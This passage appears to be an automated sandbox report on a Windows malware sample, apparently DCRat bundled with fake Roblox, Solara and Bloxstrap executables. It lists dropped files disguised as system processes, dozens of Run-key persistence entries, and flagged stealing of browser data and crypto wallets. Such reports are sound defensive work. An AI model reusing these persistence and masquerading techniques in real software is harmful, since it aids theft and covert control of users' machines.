N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Event Triggered Execution: AppInit DLLs

persistence privilege_escalation

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\Bloxstrap.exe N/A
N/A N/A C:\winNet\wscript.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\winNet\wscript.exe.exe N/A
N/A N/A C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\winNet\wscript.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A
N/A N/A C:\winNet\wscript.exe N/A
N/A N/A C:\winNet\wscript.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\winNet\lsm.exe N/A
N/A N/A C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe N/A
N/A N/A C:\winNet\lsm.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Users\Public\Pictures\sddsfsdf.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe N/A
N/A N/A C:\winNet\spoolsv.exe N/A
N/A N/A C:\Windows\Offline Web Pages\Refcrt.exe N/A
N/A N/A C:\winNet\Bloxstrap.exe N/A
N/A N/A C:\Users\All Users\Microsoft\eHome\wininit.exe N/A
N/A N/A C:\Windows\Offline Web Pages\Refcrt.exe.exe N/A
N/A N/A C:\winNet\Bloxstrap.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Users\All Users\Microsoft\eHome\wininit.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\winNet\wscript.exe N/A
N/A N/A C:\winNet\Idle.exe N/A
N/A N/A C:\winNet\wscript.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Program Files\Windows Defender\es-ES\cmd.exe N/A
N/A N/A C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe N/A
N/A N/A C:\winNet\lsm.exe N/A
N/A N/A C:\Windows\Prefetch\ReadyBoot\explorer.exe N/A
N/A N/A C:\winNet\lsm.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Users\Public\Pictures\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\WmiPrvSE.exe N/A
N/A N/A C:\winNet\lsass.exe N/A
N/A N/A C:\winNet\lsass.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\dwm.exe N/A
N/A N/A C:\Users\Default User\dllhost.exe N/A
N/A N/A C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\dwm.exe.exe N/A
N/A N/A C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\system32\MsiExec.exe N/A
N/A N/A C:\Windows\system32\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\winNet\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\Downloaded Program Files\\explorer.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\winNet\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\DriversavessessionDlldhcp\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\DriversavessessionDlldhcp\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\winNet\\lsm.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Offline Web Pages\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Offline Web Pages\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\de-DE\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\MSOCache\\All Users\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\DriversavessessionDlldhcp\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\All Users\\audiodg.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\winNet\\lsm.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\winNet\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\winNet\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Windows\\Offline Web Pages\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\winNet\\spoolsv.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\DriversavessessionDlldhcp\\dwm.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sddsfsdf = "\"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\sddsfsdf = "\"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\winNet\\Idle.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\Prefetch\\ReadyBoot\\explorer.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\MSOCache\\All Users\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Users\\Default User\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Admin\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\DriversavessessionDlldhcp\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\DriversavessessionDlldhcp\\dwm.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
